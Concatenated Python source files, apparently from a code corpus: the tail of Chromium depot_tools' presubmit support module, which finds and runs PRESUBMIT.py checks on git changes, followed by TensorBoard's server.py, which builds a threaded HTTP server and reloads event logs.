FilterSourceFile(self, affected_file, white_list=None, black_list=None): """Filters out files that aren't considered "source file". If white_list or black_list is None, InputApi.DEFAULT_WHITE_LIST and InputApi.DEFAULT_BLACK_LIST is used respectively. The lists will be compiled as regular expression and AffectedFile.LocalPath() needs to pass both list. Note: Copy-paste this function to suit your needs or use a lambda function. """ def Find(affected_file, items): local_path = affected_file.LocalPath() for item in items: if self.re.match(item, local_path): return True return False return (Find(affected_file, white_list or self.DEFAULT_WHITE_LIST) and not Find(affected_file, black_list or self.DEFAULT_BLACK_LIST)) def AffectedSourceFiles(self, source_file): """Filter the list of AffectedTestableFiles by the function source_file. If source_file is None, InputApi.FilterSourceFile() is used. """ if not source_file: source_file = self.FilterSourceFile return filter(source_file, self.AffectedTestableFiles()) def RightHandSideLines(self, source_file_filter=None): """An iterator over all text lines in "new" version of changed files. Only lists lines from new or modified text files in the change that are contained by the directory of the currently executing presubmit script. This is useful for doing line-by-line regex checks, like checking for trailing whitespace. Yields: a 3 tuple: the AffectedFile instance of the current file; integer line number (1-based); and the contents of the line as a string. Note: The carriage return (LF or CR) is stripped off. """ files = self.AffectedSourceFiles(source_file_filter) return _RightHandSideLinesImpl(files) def ReadFile(self, file_item, mode='r'): """Reads an arbitrary file. Deny reading anything outside the repository. """ if isinstance(file_item, AffectedFile): file_item = file_item.AbsoluteLocalPath() if not file_item.startswith(self.change.RepositoryRoot()): raise IOError('Access outside the repository root is denied.') return gclient_utils.FileRead(file_item, mode) def CreateTemporaryFile(self, **kwargs): """Returns a named temporary file that must be removed with a call to RemoveTemporaryFiles(). All keyword arguments are forwarded to tempfile.NamedTemporaryFile(), except for |delete|, which is always set to False. Presubmit checks that need to create a temporary file and pass it for reading should use this function instead of NamedTemporaryFile(), as Windows fails to open a file that is already open for writing. with input_api.CreateTemporaryFile() as f: f.write('xyz') f.close() input_api.subprocess.check_output(['script-that', '--reads-from', f.name]) Note that callers of CreateTemporaryFile() should not worry about removing any temporary file; this is done transparently by the presubmit handling code. """ if 'delete' in kwargs: # Prevent users from passing |delete|; we take care of file deletion # ourselves and this prevents unintuitive error messages when we pass # delete=False and 'delete' is also in kwargs. raise TypeError('CreateTemporaryFile() does not take a "delete" ' 'argument, file deletion is handled automatically by ' 'the same presubmit_support code that creates InputApi ' 'objects.') temp_file = self.tempfile.NamedTemporaryFile(delete=False, **kwargs) self._named_temporary_files.append(temp_file.name) return temp_file @property def tbr(self): """Returns if a change is TBR'ed.""" return 'TBR' in self.change.tags or self.change.TBRsFromDescription() def RunTests(self, tests_mix, parallel=True): # RunTests doesn't actually run tests. It adds them to a ThreadPool that # will run all tests once all PRESUBMIT files are processed. tests = [] msgs = [] for t in tests_mix: if isinstance(t, OutputApi.PresubmitResult) and t: msgs.append(t) else: assert issubclass(t.message, _PresubmitResult) tests.append(t) if self.verbose: t.info = _PresubmitNotifyResult t.kwargs['cwd'] = self.PresubmitLocalPath() self.thread_pool.AddTests(tests, parallel) if not self.parallel: msgs.extend(self.thread_pool.RunAsync()) return msgs class _DiffCache(object): """Caches diffs retrieved from a particular SCM.""" def __init__(self, upstream=None): """Stores the upstream revision against which all diffs will be computed.""" self._upstream = upstream def GetDiff(self, path, local_root): """Get the diff for a particular path.""" raise NotImplementedError() def GetOldContents(self, path, local_root): """Get the old version for a particular path.""" raise NotImplementedError() class _GitDiffCache(_DiffCache): """DiffCache implementation for git; gets all file diffs at once.""" def __init__(self, upstream): super(_GitDiffCache, self).__init__(upstream=upstream) self._diffs_by_file = None def GetDiff(self, path, local_root): if not self._diffs_by_file: # Compute a single diff for all files and parse the output; should # with git this is much faster than computing one diff for each file. diffs = {} # Don't specify any filenames below, because there are command line length # limits on some platforms and GenerateDiff would fail. unified_diff = scm.GIT.GenerateDiff(local_root, files=[], full_move=True, branch=self._upstream) # This regex matches the path twice, separated by a space. Note that # filename itself may contain spaces. file_marker = re.compile('^diff --git (?P<filename>.*) (?P=filename)$') current_diff = [] keep_line_endings = True for x in unified_diff.splitlines(keep_line_endings): match = file_marker.match(x) if match: # Marks the start of a new per-file section. diffs[match.group('filename')] = current_diff = [x] elif x.startswith('diff --git'): raise PresubmitFailure('Unexpected diff line: %s' % x) else: current_diff.append(x) self._diffs_by_file = dict( (normpath(path), ''.join(diff)) for path, diff in diffs.items()) if path not in self._diffs_by_file: raise PresubmitFailure( 'Unified diff did not contain entry for file %s' % path) return self._diffs_by_file[path] def GetOldContents(self, path, local_root): return scm.GIT.GetOldContents(local_root, path, branch=self._upstream) class AffectedFile(object): """Representation of a file in a change.""" DIFF_CACHE = _DiffCache # Method could be a function # pylint: disable=no-self-use def __init__(self, path, action, repository_root, diff_cache): self._path = path self._action = action self._local_root = repository_root self._is_directory = None self._cached_changed_contents = None self._cached_new_contents = None self._diff_cache = diff_cache logging.debug('%s(%s)', self.__class__.__name__, self._path) def LocalPath(self): """Returns the path of this file on the local disk relative to client root. This should be used for error messages but not for accessing files, because presubmit checks are run with CWD=PresubmitLocalPath() (which is often != client root). """ return normpath(self._path) def AbsoluteLocalPath(self): """Returns the absolute path of this file on the local disk. """ return os.path.abspath(os.path.join(self._local_root, self.LocalPath())) def Action(self): """Returns the action on this opened file, e.g. A, M, D, etc.""" return self._action def IsTestableFile(self): """Returns True if the file is a text file and not a binary file. Deleted files are not text file.""" raise NotImplementedError() # Implement when needed def IsTextFile(self): """An alias to IsTestableFile for backwards compatibility.""" return self.IsTestableFile() def OldContents(self): """Returns an iterator over the lines in the old version of file. The old version is the file before any modifications in the user's workspace, i.e. the "left hand side". Contents will be empty if the file is a directory or does not exist. Note: The carriage returns (LF or CR) are stripped off. """ return self._diff_cache.GetOldContents(self.LocalPath(), self._local_root).splitlines() def NewContents(self): """Returns an iterator over the lines in the new version of file. The new version is the file in the user's workspace, i.e. the "right hand side". Contents will be empty if the file is a directory or does not exist. Note: The carriage returns (LF or CR) are stripped off. """ if self._cached_new_contents is None: self._cached_new_contents = [] try: self._cached_new_contents = gclient_utils.FileRead( self.AbsoluteLocalPath(), 'rU').splitlines() except IOError: pass # File not found? That's fine; maybe it was deleted. return self._cached_new_contents[:] def ChangedContents(self): """Returns a list of tuples (line number, line text) of all new lines. This relies on the scm diff output describing each changed code section with a line of the form ^@@ <old line num>,<old size> <new line num>,<new size> @@$ """ if self._cached_changed_contents is not None: return self._cached_changed_contents[:] self._cached_changed_contents = [] line_num = 0 for line in self.GenerateScmDiff().splitlines(): m = re.match(r'^@@ [0-9\,\+\-]+ \+([0-9]+)\,[0-9]+ @@', line) if m: line_num = int(m.groups(1)[0]) continue if line.startswith('+') and not line.startswith('++'): self._cached_changed_contents.append((line_num, line[1:])) if not line.startswith('-'): line_num += 1 return self._cached_changed_contents[:] def __str__(self): return self.LocalPath() def GenerateScmDiff(self): return self._diff_cache.GetDiff(self.LocalPath(), self._local_root) class GitAffectedFile(AffectedFile): """Representation of a file in a change out of a git checkout.""" # Method 'NNN' is abstract in class 'NNN' but is not overridden # pylint: disable=abstract-method DIFF_CACHE = _GitDiffCache def __init__(self, *args, **kwargs): AffectedFile.__init__(self, *args, **kwargs) self._server_path = None self._is_testable_file = None def IsTestableFile(self): if self._is_testable_file is None: if self.Action() == 'D': # A deleted file is not testable. self._is_testable_file = False else: self._is_testable_file = os.path.isfile(self.AbsoluteLocalPath()) return self._is_testable_file class Change(object): """Describe a change. Used directly by the presubmit scripts to query the current change being tested. Instance members: tags: Dictionary of KEY=VALUE pairs found in the change description. self.KEY: equivalent to tags['KEY'] """ _AFFECTED_FILES = AffectedFile # Matches key/value (or "tag") lines in changelist descriptions. TAG_LINE_RE = re.compile( '^[ \t]*(?P<key>[A-Z][A-Z_0-9]*)[ \t]*=[ \t]*(?P<value>.*?)[ \t]*$') scm = '' def __init__( self, name, description, local_root, files, issue, patchset, author, upstream=None): if files is None: files = [] self._name = name # Convert root into an absolute path. self._local_root = os.path.abspath(local_root) self._upstream = upstream self.issue = issue self.patchset = patchset self.author_email = author self._full_description = '' self.tags = {} self._description_without_tags = '' self.SetDescriptionText(description) assert all( (isinstance(f, (list, tuple)) and len(f) == 2) for f in files), files diff_cache = self._AFFECTED_FILES.DIFF_CACHE(self._upstream) self._affected_files = [ self._AFFECTED_FILES(path, action.strip(), self._local_root, diff_cache) for action, path in files ] def Name(self): """Returns the change name.""" return self._name def DescriptionText(self): """Returns the user-entered changelist description, minus tags. Any line in the user-provided description starting with e.g. "FOO=" (whitespace permitted before and around) is considered a tag line. Such lines are stripped out of the description this function returns. """ return self._description_without_tags def FullDescriptionText(self): """Returns the complete changelist description including tags.""" return self._full_description def SetDescriptionText(self, description): """Sets the full description text (including tags) to |description|. Also updates the list of tags.""" self._full_description = description # From the description text, build up a dictionary of key/value pairs # plus the description minus all key/value or "tag" lines. description_without_tags = [] self.tags = {} for line in self._full_description.splitlines(): m = self.TAG_LINE_RE.match(line) if m: self.tags[m.group('key')] = m.group('value') else: description_without_tags.append(line) # Change back to text and remove whitespace at end. self._description_without_tags = ( '\n'.join(description_without_tags).rstrip()) def RepositoryRoot(self): """Returns the repository (checkout) root directory for this change, as an absolute path. """ return self._local_root def __getattr__(self, attr): """Return tags directly as attributes on the object.""" if not re.match(r"^[A-Z_]*$", attr): raise AttributeError(self, attr) return self.tags.get(attr) def BugsFromDescription(self): """Returns all bugs referenced in the commit description.""" tags = [b.strip() for b in self.tags.get('BUG', '').split(',') if b.strip()] footers = git_footers.parse_footers(self._full_description).get('Bug', []) return sorted(set(tags + footers)) def ReviewersFromDescription(self): """Returns all reviewers listed in the commit description.""" # We don't support a "R:" git-footer for reviewers; that is in metadata. tags = [r.strip() for r in self.tags.get('R', '').split(',') if r.strip()] return sorted(set(tags)) def TBRsFromDescription(self): """Returns all TBR reviewers listed in the commit description.""" tags = [r.strip() for r in self.tags.get('TBR', '').split(',') if r.strip()] # TODO(agable): Remove support for 'Tbr:' when TBRs are programmatically # determined by self-CR+1s. footers = git_footers.parse_footers(self._full_description).get('Tbr', []) return sorted(set(tags + footers)) # TODO(agable): Delete these once we're sure they're unused. @property def BUG(self): return ','.join(self.BugsFromDescription()) @property def R(self): return ','.join(self.ReviewersFromDescription()) @property def TBR(self): return ','.join(self.TBRsFromDescription()) def AllFiles(self, root=None): """List all files under source control in the repo.""" raise NotImplementedError() def AffectedFiles(self, include_deletes=True, file_filter=None): """Returns a list of AffectedFile instances for all files in the change. Args: include_deletes: If false, deleted files will be filtered out. file_filter: An additional filter to apply. Returns: [AffectedFile(path, action), AffectedFile(path, action)] """ affected = filter(file_filter, self._affected_files) if include_deletes: return affected return filter(lambda x: x.Action() != 'D', affected) def AffectedTestableFiles(self, include_deletes=None, **kwargs): """Return a list of the existing text files in a change.""" if include_deletes is not None: warn("AffectedTeestableFiles(include_deletes=%s)" " is deprecated and ignored" % str(include_deletes), category=DeprecationWarning, stacklevel=2) return filter(lambda x: x.IsTestableFile(), self.AffectedFiles(include_deletes=False, **kwargs)) def AffectedTextFiles(self, include_deletes=None): """An alias to AffectedTestableFiles for backwards compatibility.""" return self.AffectedTestableFiles(include_deletes=include_deletes) def LocalPaths(self): """Convenience function.""" return [af.LocalPath() for af in self.AffectedFiles()] def AbsoluteLocalPaths(self): """Convenience function.""" return [af.AbsoluteLocalPath() for af in self.AffectedFiles()] def RightHandSideLines(self): """An iterator over all text lines in "new" version of changed files. Lists lines from new or modified text files in the change. This is useful for doing line-by-line regex checks, like checking for trailing whitespace. Yields: a 3 tuple: the AffectedFile instance of the current file; integer line number (1-based); and the contents of the line as a string. """ return _RightHandSideLinesImpl( x for x in self.AffectedFiles(include_deletes=False) if x.IsTestableFile()) def OriginalOwnersFiles(self): """A map from path names of affected OWNERS files to their old content.""" def owners_file_filter(f): return 'OWNERS' in os.path.split(f.LocalPath())[1] files = self.AffectedFiles(file_filter=owners_file_filter) return dict([(f.LocalPath(), f.OldContents()) for f in files]) class GitChange(Change): _AFFECTED_FILES = GitAffectedFile scm = 'git' def AllFiles(self, root=None): """List all files under source control in the repo.""" root = root or self.RepositoryRoot() return subprocess.check_output( ['git', '-c', 'core.quotePath=false', 'ls-files', '--', '.'], cwd=root).splitlines() def ListRelevantPresubmitFiles(files, root): """Finds all presubmit files that apply to a given set of source files. If inherit-review-settings-ok is present right under root, looks for PRESUBMIT.py in directories enclosing root. Args: files: An iterable container containing file paths. root: Path where to stop searching. Return: List of absolute paths of the existing PRESUBMIT.py scripts. """ files = [normpath(os.path.join(root, f)) for f in files] # List all the individual directories containing files. directories = set([os.path.dirname(f) for f in files]) # Ignore root if inherit-review-settings-ok is present. if os.path.isfile(os.path.join(root, 'inherit-review-settings-ok')): root = None # Collect all unique directories that may contain PRESUBMIT.py. candidates = set() for directory in directories: while True: if directory in candidates: break candidates.add(directory) if directory == root: break parent_dir = os.path.dirname(directory) if parent_dir == directory: # We hit the system root directory. break directory = parent_dir # Look for PRESUBMIT.py in all candidate directories. results = [] for directory in sorted(list(candidates)): try: for f in os.listdir(directory): p = os.path.join(directory, f) if os.path.isfile(p) and re.match( r'PRESUBMIT.*\.py$', f) and not f.startswith('PRESUBMIT_test'): results.append(p) except OSError: pass logging.debug('Presubmit files: %s', ','.join(results)) return results class GetTryMastersExecuter(object): @staticmethod def ExecPresubmitScript(script_text, presubmit_path, project, change): """Executes GetPreferredTryMasters() from a single presubmit script. Args: script_text: The text of the presubmit script. presubmit_path: Project script to run. project: Project name to pass to presubmit script for bot selection. Return: A map of try masters to map of builders to set of tests. """ context = {} try: exec script_text in context except Exception, e: raise PresubmitFailure('"%s" had an exception.\n%s' % (presubmit_path, e)) function_name = 'GetPreferredTryMasters' if function_name not in context: return {} get_preferred_try_masters = context[function_name] if not len(inspect.getargspec(get_preferred_try_masters)[0]) == 2: raise PresubmitFailure( 'Expected function "GetPreferredTryMasters" to take two arguments.') return get_preferred_try_masters(project, change) class GetPostUploadExecuter(object): @staticmethod def ExecPresubmitScript(script_text, presubmit_path, cl, change): """Executes PostUploadHook() from a single presubmit script. Args: script_text: The text of the presubmit script. presubmit_path: Project script to run. cl: The Changelist object. change: The Change object. Return: A list of results objects. """ context = {} try: exec script_text in context except Exception, e: raise PresubmitFailure('"%s" had an exception.\n%s' % (presubmit_path, e)) function_name = 'PostUploadHook' if function_name not in context: return {} post_upload_hook = context[function_name] if not len(inspect.getargspec(post_upload_hook)[0]) == 3: raise PresubmitFailure( 'Expected function "PostUploadHook" to take three arguments.') return post_upload_hook(cl, change, OutputApi(False)) def _MergeMasters(masters1, masters2): """Merges two master maps. Merges also the tests of each builder.""" result = {} for (master, builders) in itertools.chain(masters1.iteritems(), masters2.iteritems()): new_builders = result.setdefault(master, {}) for (builder, tests) in builders.iteritems(): new_builders.setdefault(builder, set([])).update(tests) return result def DoGetTryMasters(change, changed_files, repository_root, default_presubmit, project, verbose, output_stream): """Get the list of try masters from the presubmit scripts. Args: changed_files: List of modified files. repository_root: The repository root. default_presubmit: A default presubmit script to execute in any case. project: Optional name of a project used in selecting trybots. verbose: Prints debug info. output_stream: A stream to write debug output to. Return: Map of try masters to map of builders to set of tests. """ presubmit_files = ListRelevantPresubmitFiles(changed_files, repository_root) if not presubmit_files and verbose: output_stream.write("Warning, no PRESUBMIT.py found.\n") results = {} executer = GetTryMastersExecuter() if default_presubmit: if verbose: output_stream.write("Running default presubmit script.\n") fake_path = os.path.join(repository_root, 'PRESUBMIT.py') results = _MergeMasters(results, executer.ExecPresubmitScript( default_presubmit, fake_path, project, change)) for filename in presubmit_files: filename = os.path.abspath(filename) if verbose: output_stream.write("Running %s\n" % filename) # Accept CRLF presubmit script. presubmit_script = gclient_utils.FileRead(filename, 'rU') results = _MergeMasters(results, executer.ExecPresubmitScript( presubmit_script, filename, project, change)) # Make sets to lists again for later JSON serialization. for builders in results.itervalues(): for builder in builders: builders[builder] = list(builders[builder]) if results and verbose: output_stream.write('%s\n' % str(results)) return results def DoPostUploadExecuter(change, cl, repository_root, verbose, output_stream): """Execute the post upload hook. Args: change: The Change object. cl: The Changelist object. repository_root: The repository root. verbose: Prints debug info. output_stream: A stream to write debug output to. """ presubmit_files = ListRelevantPresubmitFiles( change.LocalPaths(), repository_root) if not presubmit_files and verbose: output_stream.write("Warning, no PRESUBMIT.py found.\n") results = [] executer = GetPostUploadExecuter() # The root presubmit file should be executed after the ones in subdirectories. # i.e. the specific post upload hooks should run before the general ones. # Thus, reverse the order provided by ListRelevantPresubmitFiles. presubmit_files.reverse() for filename in presubmit_files: filename = os.path.abspath(filename) if verbose: output_stream.write("Running %s\n" % filename) # Accept CRLF presubmit script. presubmit_script = gclient_utils.FileRead(filename, 'rU') results.extend(executer.ExecPresubmitScript( presubmit_script, filename, cl, change)) output_stream.write('\n') if results: output_stream.write('** Post Upload Hook Messages **\n') for result in results: result.handle(output_stream) output_stream.write('\n') return results class PresubmitExecuter(object): def __init__(self, change, committing, verbose, gerrit_obj, dry_run=None, thread_pool=None, parallel=False): """ Args: change: The Change object. committing: True if 'git cl land' is running, False if 'git cl upload' is. gerrit_obj: provides basic Gerrit codereview functionality. dry_run: if true, some Checks will be skipped. parallel: if true, all tests reported via input_api.RunTests for all PRESUBMIT files will be run in parallel. """ self.change = change self.committing = committing self.gerrit = gerrit_obj self.verbose = verbose self.dry_run = dry_run self.more_cc = [] self.thread_pool = thread_pool self.parallel = parallel def ExecPresubmitScript(self, script_text, presubmit_path): """Executes a single presubmit script. Args: script_text: The text of the presubmit script. presubmit_path: The path to the presubmit file (this will be reported via input_api.PresubmitLocalPath()). Return: A list of result objects, empty if no problems. """ # Change to the presubmit file's directory to support local imports. main_path = os.getcwd() os.chdir(os.path.dirname(presubmit_path)) # Load the presubmit script into context. input_api = InputApi(self.change, presubmit_path, self.committing, self.verbose, gerrit_obj=self.gerrit, dry_run=self.dry_run, thread_pool=self.thread_pool, parallel=self.parallel) output_api = OutputApi(self.committing) context = {} try: exec script_text in context except Exception, e: raise PresubmitFailure('"%s" had an exception.\n%s' % (presubmit_path, e)) # These function names must change if we make substantial changes to # the presubmit API that are not backwards compatible. if self.committing: function_name = 'CheckChangeOnCommit' else: function_name = 'CheckChangeOnUpload' if function_name in context: try: context['__args'] = (input_api, output_api) logging.debug('Running %s in %s', function_name, presubmit_path) result = eval(function_name + '(*__args)', context) logging.debug('Running %s done.', function_name) self.more_cc.extend(output_api.more_cc) finally: map(os.remove, input_api._named_temporary_files) if not (isinstance(result, types.TupleType) or isinstance(result, types.ListType)): raise PresubmitFailure( 'Presubmit functions must return a tuple or list') for item in result: if not isinstance(item, OutputApi.PresubmitResult): raise PresubmitFailure( 'All presubmit results must be of types derived from ' 'output_api.PresubmitResult') else: result = () # no error since the script doesn't care about current event. # Return the process to the original working directory. os.chdir(main_path) return result def DoPresubmitChecks(change, committing, verbose, output_stream, input_stream, default_presubmit, may_prompt, gerrit_obj, dry_run=None, parallel=False): """Runs all presubmit checks that apply to the files in the change. This finds all PRESUBMIT.py files in directories enclosing the files in the change (up to the repository root) and calls the relevant entrypoint function depending on whether the change is being committed or uploaded. Prints errors, warnings and notifications. Prompts the user for warnings when needed. Args: change: The Change object. committing: True if 'git cl land' is running, False if 'git cl upload' is. verbose: Prints debug info. output_stream: A stream to write output from presubmit tests to. input_stream: A stream to read input from the user. default_presubmit: A default presubmit script to execute in any case. may_prompt: Enable (y/n) questions on warning or error. If False, any questions are answered with yes by default. gerrit_obj: provides basic Gerrit codereview functionality. dry_run: if true, some Checks will be skipped. parallel: if true, all tests specified by input_api.RunTests in all PRESUBMIT files will be run in parallel. Warning: If may_prompt is true, output_stream SHOULD be sys.stdout and input_stream SHOULD be sys.stdin. Return: A PresubmitOutput object. Use output.should_continue() to figure out if there were errors or warnings and the caller should abort. """ old_environ = os.environ try: # Make sure python subprocesses won't generate .pyc files. os.environ = os.environ.copy() os.environ['PYTHONDONTWRITEBYTECODE'] = '1' output = PresubmitOutput(input_stream, output_stream) if committing: output.write("Running presubmit commit checks ...\n") else: output.write("Running presubmit upload checks ...\n") start_time = time.time() presubmit_files = ListRelevantPresubmitFiles( change.AbsoluteLocalPaths(), change.RepositoryRoot()) if not presubmit_files and verbose: output.write("Warning, no PRESUBMIT.py found.\n") results = [] thread_pool = ThreadPool() executer = PresubmitExecuter(change, committing, verbose, gerrit_obj, dry_run, thread_pool) if default_presubmit: if verbose: output.write("Running default presubmit script.\n") fake_path = os.path.join(change.RepositoryRoot(), 'PRESUBMIT.py') results += executer.ExecPresubmitScript(default_presubmit, fake_path) for filename in presubmit_files: filename = os.path.abspath(filename) if verbose: output.write("Running %s\n" % filename) # Accept CRLF presubmit script. presubmit_script = gclient_utils.FileRead(filename, 'rU') results += executer.ExecPresubmitScript(presubmit_script, filename) results += thread_pool.RunAsync() output.more_cc.extend(executer.more_cc) errors = [] notifications = [] warnings = [] for result in results: if result.fatal: errors.append(result) elif result.should_prompt: warnings.append(result) else: notifications.append(result) output.write('\n') for name, items in (('Messages', notifications), ('Warnings', warnings), ('ERRORS', errors)): if items: output.write('** Presubmit %s **\n' % name) for item in items: item.handle(output) output.write('\n') total_time = time.time() - start_time if total_time > 1.0: output.write("Presubmit checks took %.1fs to calculate.\n\n" % total_time) if errors: output.fail() elif warnings: output.write('There were presubmit warnings. ') if may_prompt: output.prompt_yes_no('Are you sure you wish to continue? (y/N): ') else: output.write('Presubmit checks passed.\n') global _ASKED_FOR_FEEDBACK # Ask for feedback one time out of 5. if (len(results) and random.randint(0, 4) == 0 and not _ASKED_FOR_FEEDBACK): output.write( 'Was the presubmit check useful? If not, run "git cl presubmit -v"\n' 'to figure out which PRESUBMIT.py was run, then run git blame\n' 'on the file to figure out who to ask for help.\n') _ASKED_FOR_FEEDBACK = True return output finally: os.environ = old_environ def ScanSubDirs(mask, recursive): if not recursive: return [x for x in glob.glob(mask) if x not in ('.svn', '.git')] results = [] for root, dirs, files in os.walk('.'): if '.svn' in dirs: dirs.remove('.svn') if '.git' in dirs: dirs.remove('.git') for name in files: if fnmatch.fnmatch(name, mask): results.append(os.path.join(root, name)) return results def ParseFiles(args, recursive): logging.debug('Searching for %s', args) files = [] for arg in args: files.extend([('M', f) for f in ScanSubDirs(arg, recursive)]) return files def load_files(options, args): """Tries to determine the SCM.""" files = [] if args: files = ParseFiles(args, options.recursive) change_scm = scm.determine_scm(options.root) if change_scm == 'git': change_class = GitChange upstream = options.upstream or None if not files: files = scm.GIT.CaptureStatus([], options.root, upstream) else: logging.info('Doesn\'t seem under source control. Got %d files', len(args)) if not files: return None, None change_class = Change return change_class, files @contextlib.contextmanager def canned_check_filter(method_names): filtered = {} try: for method_name in method_names: if not hasattr(presubmit_canned_checks, method_name): logging.warn('Skipping unknown "canned" check %s' % method_name) continue filtered[method_name] = getattr(presubmit_canned_checks, method_name) setattr(presubmit_canned_checks, method_name, lambda *_a, **_kw: []) yield finally: for name, method in filtered.iteritems(): setattr(presubmit_canned_checks, name, method) def main(argv=None): parser = optparse.OptionParser(usage="%prog [options] <files...>", version="%prog " + str(__version__)) parser.add_option("-c", "--commit", action="store_true", default=False, help="Use commit instead of upload checks") parser.add_option("-u", "--upload", action="store_false", dest='commit', help="Use upload instead of commit checks") parser.add_option("-r", "--recursive", action="store_true", help="Act recursively") parser.add_option("-v", "--verbose", action="count", default=0, help="Use 2 times for more debug info") parser.add_option("--name", default='no name') parser.add_option("--author") parser.add_option("--description", default='') parser.add_option("--issue", type='int', default=0) parser.add_option("--patchset", type='int', default=0) parser.add_option("--root", default=os.getcwd(), help="Search for PRESUBMIT.py up to this directory. " "If inherit-review-settings-ok is present in this " "directory, parent directories up to the root file " "system directories will also be searched.") parser.add_option("--upstream", help="Git only: the base ref or upstream branch against " "which the diff should be computed.") parser.add_option("--default_presubmit") parser.add_option("--may_prompt", action='store_true', default=False) parser.add_option("--skip_canned", action='append', default=[], help="A list of checks to skip which appear in " "presubmit_canned_checks. Can be provided multiple times " "to skip multiple canned checks.") parser.add_option("--dry_run", action='store_true', help=optparse.SUPPRESS_HELP) parser.add_option("--gerrit_url", help=optparse.SUPPRESS_HELP) parser.add_option("--gerrit_fetch", action='store_true', help=optparse.SUPPRESS_HELP) parser.add_option('--parallel', action='store_true', help='Run all tests specified by input_api.RunTests in all ' 'PRESUBMIT files in parallel.') options, args = parser.parse_args(argv) if options.verbose >= 2: logging.basicConfig(level=logging.DEBUG) elif options.verbose: logging.basicConfig(level=logging.INFO) else: logging.basicConfig(level=logging.ERROR) change_class, files = load_files(options, args) if not change_class: parser.error('For unversioned directory, <files> is not optional.') logging.info('Found %d file(s).', len(files)) gerrit_obj = None if options.gerrit_url and options.gerrit_fetch: assert options.issue and options.patchset gerrit_obj = GerritAccessor(urlparse.urlparse(options.gerrit_url).netloc) options.author = gerrit_obj.GetChangeOwner(options.issue) options.description = gerrit_obj.GetChangeDescription(options.issue, options.patchset) logging.info('Got author: "%s"', options.author) logging.info('Got description: """\n%s\n"""', options.description) try: with canned_check_filter(options.skip_canned): results = DoPresubmitChecks( change_class(options.name, options.description, options.root, files, options.issue, options.patchset, options.author, upstream=options.upstream), options.commit, options.verbose, sys.stdout, sys.stdin, options.default_presubmit, options.may_prompt, gerrit_obj, options.dry_run, options.parallel) return not results.should_continue() except PresubmitFailure, e: print >> sys.stderr, e print >> sys.stderr, 'Maybe your depot_tools is out of date?' return 2 if __name__ == '__main__': fix_encoding.fix_encoding() try: sys.exit(main()) except KeyboardInterrupt: sys.stderr.write('interrupted\n') sys.exit(2)
server.py
# Copyright 2015 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Module for building TensorBoard servers. This is its own module so it can be used in both actual code and test code. """ from __future__ import absolute_import from __future__ import division from __future__ import print_function import functools import os import threading import time import re import six from six.moves import BaseHTTPServer from six.moves import socketserver from tensorflow.python.platform import tf_logging as logging from tensorflow.python.summary import event_accumulator from tensorflow.python.summary.impl import io_wrapper from tensorflow.tensorboard.backend import handler # How many elements to store per tag, by tag type TENSORBOARD_SIZE_GUIDANCE = { event_accumulator.COMPRESSED_HISTOGRAMS: 500, event_accumulator.IMAGES: 4, event_accumulator.AUDIO: 4, event_accumulator.SCALARS: 1000, event_accumulator.HISTOGRAMS: 50, } def ParseEventFilesSpec(logdir): """Parses `logdir` into a map from paths to run group names. The events files flag format is a comma-separated list of path specifications. A path specification either looks like 'group_name:/path/to/directory' or '/path/to/directory'; in the latter case, the group is unnamed. Group names cannot start with a forward slash: /foo:bar/baz will be interpreted as a spec with no name and path '/foo:bar/baz'. Globs are not supported. Args: logdir: A comma-separated list of run specifications. Returns: A dict mapping directory paths to names like {'/path/to/directory': 'name'}. Groups without an explicit name are named after their path. If logdir is None, returns an empty dict, which is helpful for testing things that don't require any valid runs. """ files = {} if logdir is None: return files # Make sure keeping consistent with ParseURI in core/lib/io/path.cc uri_pattern = re.compile("[a-zA-Z][0-9a-zA-Z.]://.*") for specification in logdir.split(','): # Check if the spec contains group. A spec start with xyz:// is regarded as # URI path spec instead of group spec. If the spec looks like /foo:bar/baz, # then we assume it's a path with a colon. if uri_pattern.match(specification) is None and \ ':' in specification and specification[0] != '/': # We split at most once so run_name:/path:with/a/colon will work. run_name, _, path = specification.partition(':') else: run_name = None path = specification if uri_pattern.match(path) is None: path = os.path.realpath(path) files[path] = run_name return files def ReloadMultiplexer(multiplexer, path_to_run): """Loads all runs into the multiplexer. Args: multiplexer: The `EventMultiplexer` to add runs to and reload. path_to_run: A dict mapping from paths to run names, where `None` as the run name is interpreted as a run name equal to the path. """ start = time.time() logging.info('TensorBoard reload process beginning') for (path, name) in six.iteritems(path_to_run): multiplexer.AddRunsFromDirectory(path, name) logging.info('TensorBoard reload process: Reload the whole Multiplexer') multiplexer.Reload() duration = time.time() - start logging.info('TensorBoard done reloading. Load took %0.3f secs', duration) def StartMultiplexerReloadingThread(multiplexer, path_to_run, load_interval): """Starts a thread to automatically reload the given multiplexer. The thread will reload the multiplexer by calling `ReloadMultiplexer` every `load_interval` seconds, starting immediately. Args: multiplexer: The `EventMultiplexer` to add runs to and reload. path_to_run: A dict mapping from paths to run names, where `None` as the run name is interpreted as a run name equal to the path. load_interval: How many seconds to wait after one load before starting the next load. Returns: A started `threading.Thread` that reloads the multiplexer. """ # We don't call multiplexer.Reload() here because that would make # AddRunsFromDirectory block until the runs have all loaded. def _ReloadForever(): while True: ReloadMultiplexer(multiplexer, path_to_run) time.sleep(load_interval) thread = threading.Thread(target=_ReloadForever) thread.daemon = True thread.start() return thread class ThreadedHTTPServer(socketserver.ThreadingMixIn, BaseHTTPServer.HTTPServer): """A threaded HTTP server.""" daemon_threads = True def BuildServer(multiplexer, host, port, logdir): """Sets up an HTTP server for running TensorBoard. Args: multiplexer: An `EventMultiplexer` that the server will query for information about events. host: The host name. port: The port number to bind to, or 0 to pick one automatically. logdir: The logdir argument string that tensorboard started up with. Returns: A `BaseHTTPServer.HTTPServer`. """ factory = functools.partial(handler.TensorboardHandler, multiplexer, logdir) return ThreadedHTTPServer((host, port), factory)
semaphore.py
